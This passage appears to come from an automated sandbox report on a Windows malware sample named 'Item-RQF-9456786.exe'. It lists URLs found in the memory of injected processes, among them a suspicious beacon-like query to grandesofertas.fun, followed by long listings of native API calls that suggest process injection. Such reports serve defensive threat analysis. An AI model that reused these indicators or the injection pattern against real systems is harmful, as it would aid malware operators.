    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
    Source: fontview.exe, 0000000A.00000002.4743802201.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000A.00000002.4745385758.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002C74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
    Source: firefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
    Source: fontview.exe, 0000000A.00000002.4743802201.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000A.00000002.4745385758.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002C74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006C8C000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003F4C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.grandesofertas.fun/cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGb
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_ho
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_auto
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0042CBD3 NtClose,5_2_0042CBD3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2B60 NtClose,LdrInitializeThunk,5_2_017E2B60
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_017E2DF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_017E2C70
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E35C0 NtCreateMutant,LdrInitializeThunk,5_2_017E35C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E4340 NtSetContextThread,5_2_017E4340
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E4650 NtSuspendThread,5_2_017E4650
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2BF0 NtAllocateVirtualMemory,5_2_017E2BF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2BE0 NtQueryValueKey,5_2_017E2BE0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2BA0 NtEnumerateValueKey,5_2_017E2BA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2B80 NtQueryInformationFile,5_2_017E2B80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2AF0 NtWriteFile,5_2_017E2AF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2AD0 NtReadFile,5_2_017E2AD0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2AB0 NtWaitForSingleObject,5_2_017E2AB0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2D30 NtUnmapViewOfSection,5_2_017E2D30
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2D10 NtMapViewOfSection,5_2_017E2D10
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2D00 NtSetInformationFile,5_2_017E2D00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2DD0 NtDelayExecution,5_2_017E2DD0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2DB0 NtEnumerateKey,5_2_017E2DB0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2C60 NtCreateKey,5_2_017E2C60
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2C00 NtQueryInformationProcess,5_2_017E2C00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2CF0 NtOpenProcess,5_2_017E2CF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2CC0 NtQueryVirtualMemory,5_2_017E2CC0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2CA0 NtQueryInformationToken,5_2_017E2CA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2F60 NtCreateProcessEx,5_2_017E2F60
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2F30 NtCreateSection,5_2_017E2F30
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2FE0 NtCreateFile,5_2_017E2FE0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2FB0 NtResumeThread,5_2_017E2FB0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2FA0 NtQuerySection,5_2_017E2FA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2F90 NtProtectVirtualMemory,5_2_017E2F90
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2E30 NtWriteVirtualMemory,5_2_017E2E30
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2EE0 NtQueueApcThread,5_2_017E2EE0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2EA0 NtAdjustPrivilegesToken,5_2_017E2EA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2E80 NtReadVirtualMemory,5_2_017E2E80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E3010 NtOpenDirectoryObject,5_2_017E3010
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E3090 NtSetValueKey,5_2_017E3090
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E39B0 NtGetContextThread,5_2_017E39B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E3D70 NtOpenThread,5_2_017E3D70
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E3D10 NtOpenProcessToken,5_2_017E3D10
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050135C0 NtCreateMutant,LdrInitializeThunk,10_2_050135C0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05014650 NtSuspendThread,LdrInitializeThunk,10_2_05014650
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05014340 NtSetContextThread,LdrInitializeThunk,10_2_05014340
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012D10 NtMapViewOfSection,LdrInitializeThunk,10_2_05012D10
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_05012D30
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012DD0 NtDelayExecution,LdrInitializeThunk,10_2_05012DD0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_05012DF0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012C60 NtCreateKey,LdrInitializeThunk,10_2_05012C60
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_05012C70
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_05012CA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012F30 NtCreateSection,LdrInitializeThunk,10_2_05012F30
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012FB0 NtResumeThread,LdrInitializeThunk,10_2_05012FB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012FE0 NtCreateFile,LdrInitializeThunk,10_2_05012FE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_05012E80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012EE0 NtQueueApcThread,LdrInitializeThunk,10_2_05012EE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050139B0 NtGetContextThread,LdrInitializeThunk,10_2_050139B0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012B60 NtClose,LdrInitializeThunk,10_2_05012B60
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_05012BA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012BE0 NtQueryValueKey,LdrInitializeThunk,10_2_05012BE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_05012BF0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012AD0 NtReadFile,LdrInitializeThunk,10_2_05012AD0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012AF0 NtWriteFile,LdrInitializeThunk,10_2_05012AF0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05013010 NtOpenDirectoryObject,10_2_05013010
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05013090 NtSetValueKey,10_2_05013090
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012D00 NtSetInformationFile,10_2_05012D00
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05013D10 NtOpenProcessToken,10_2_05013D10
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05013D70 NtOpenThread,10_2_05013D70
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012DB0 NtEnumerateKey,10_2_05012DB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012C00 NtQueryInformationProcess,10_2_05012C00
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012CC0 NtQueryVirtualMemory,10_2_05012CC0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012CF0 NtOpenProcess,10_2_05012CF0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012F60 NtCreateProcessEx,10_2_05012F60
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012F90 NtProtectVirtualMemory,10_2_05012F90
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012FA0 NtQuerySection,10_2_05012FA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012E30 NtWriteVirtualMemory,10_2_05012E30
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012EA0 NtAdjustPrivilegesToken,10_2_05012EA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012B80 NtQueryInformationFile,10_2_05012B80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012AB0 NtWaitForSingleObject,10_2_05012AB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029300 NtCreateFile,10_2_03029300
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029770 NtAllocateVirtualMemory,10_2_03029770
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029600 NtClose,10_2_03029600
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029560 NtDeleteFile,10_2_03029560
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029470 NtReadFile,10_2_03029470
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 0_2_00B03E280_2_00B03E28
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 0_2_00B06F900_2_00B06F90
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 0_2_00B0F0440_2_00B0F044
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 0_2_076D94F00_2_076D94F0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 0_2_076D11FC0_2_076D11FC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 0_2_076D35BA0_2_076D35BA
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 0_2_076D11F30_2_076D11F3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00418A835_2_00418A83
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0042F2135_2_0042F213
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0041030A5_2_0041030A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004103135_2_00410313
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004033255_2_00403325
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004033305_2_00403330
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00416C8F5_2_00416C8F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_00416C935_2_00416C93
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004105335_2_00410533
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0040E5B35_2_0040E5B3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004026F35_2_004026F3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0040E6F75_2_0040E6F7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_004027005_2_00402700
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018701AA5_2_018701AA
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018681CC5_2_018681CC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A01005_2_017A0100
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184A1185_2_0184A118
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018381585_2_01838158
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018420005_2_01842000
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018703E65_2_018703E6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE3F05_2_017BE3F0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186A3525_2_0186A352
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018302C05_2_018302C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018502745_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018705915_2_01870591
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B05355_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0185E4F65_2_0185E4F6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018624465_2_01862446
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B07705_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D47505_2_017D4750
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AC7C05_2_017AC7C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CC6E05_2_017CC6E0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C69625_2_017C6962
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0187A9A65_2_0187A9A6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A05_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BA8405_2_017BA840
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B28405_2_017B2840
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE8F05_2_017DE8F0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017968B85_2_017968B8
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01866BD75_2_01866BD7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186AB405_2_0186AB40
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AEA805_2_017AEA80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BAD005_2_017BAD00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AADE05_2_017AADE0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184CD1F5_2_0184CD1F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C8DBF5_2_017C8DBF
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850CB55_2_01850CB5
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0C005_2_017B0C00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0CF25_2_017A0CF2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182EFA05_2_0182EFA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D0F305_2_017D0F30
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017F2F285_2_017F2F28
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BCFE05_2_017BCFE0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A2FC85_2_017A2FC8
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01824F405_2_01824F40
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186CE935_2_0186CE93
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0E595_2_017B0E59
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186EEDB5_2_0186EEDB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186EE265_2_0186EE26
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C2E905_2_017C2E90
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179F1725_2_0179F172
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E516C5_2_017E516C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BB1B05_2_017BB1B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0187B16B5_2_0187B16B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0185F0CC5_2_0185F0CC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186F0E05_2_0186F0E0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018670E95_2_018670E9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B70C05_2_017B70C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179D34C5_2_0179D34C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186132D5_2_0186132D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017F739A5_2_017F739A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018512ED5_2_018512ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CB2C05_2_017CB2C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B52A05_2_017B52A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184D5B05_2_0184D5B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018675715_2_01867571
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A14605_2_017A1460
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186F43F5_2_0186F43F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186F7B05_2_0186F7B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018616CC5_2_018616CC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B99505_2_017B9950
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CB9505_2_017CB950
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018459105_2_01845910
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181D8005_2_0181D800
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B38E05_2_017B38E0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01825BF05_2_01825BF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017EDBF95_2_017EDBF9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186FB765_2_0186FB76
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CFB805_2_017CFB80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184DAAC5_2_0184DAAC
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0185DAC65_2_0185DAC6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01867A465_2_01867A46
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186FA495_2_0186FA49
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017F5AA05_2_017F5AA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01823A6C5_2_01823A6C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B3D405_2_017B3D40
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CFDC05_2_017CFDC0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01861D5A5_2_01861D5A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01867D735_2_01867D73
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186FCF25_2_0186FCF2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01829C325_2_01829C32
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186FFB15_2_0186FFB1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186FF095_2_0186FF09
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B1F925_2_017B1F92
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B9EB05_2_017B9EB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509757110_2_05097571
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050A059110_2_050A0591
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FD146010_2_04FD1460
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0507D5B010_2_0507D5B0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509F43F10_2_0509F43F
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509244610_2_05092446
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE053510_2_04FE0535
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0508E4F610_2_0508E4F6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFC6E010_2_04FFC6E0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0500475010_2_05004750
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509F7B010_2_0509F7B0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FDC7C010_2_04FDC7C0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE077010_2_04FE0770
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050916CC10_2_050916CC
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0507A11810_2_0507A118
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE70C010_2_04FE70C0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050AB16B10_2_050AB16B
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0501516C10_2_0501516C
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050A01AA10_2_050A01AA
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050981CC10_2_050981CC
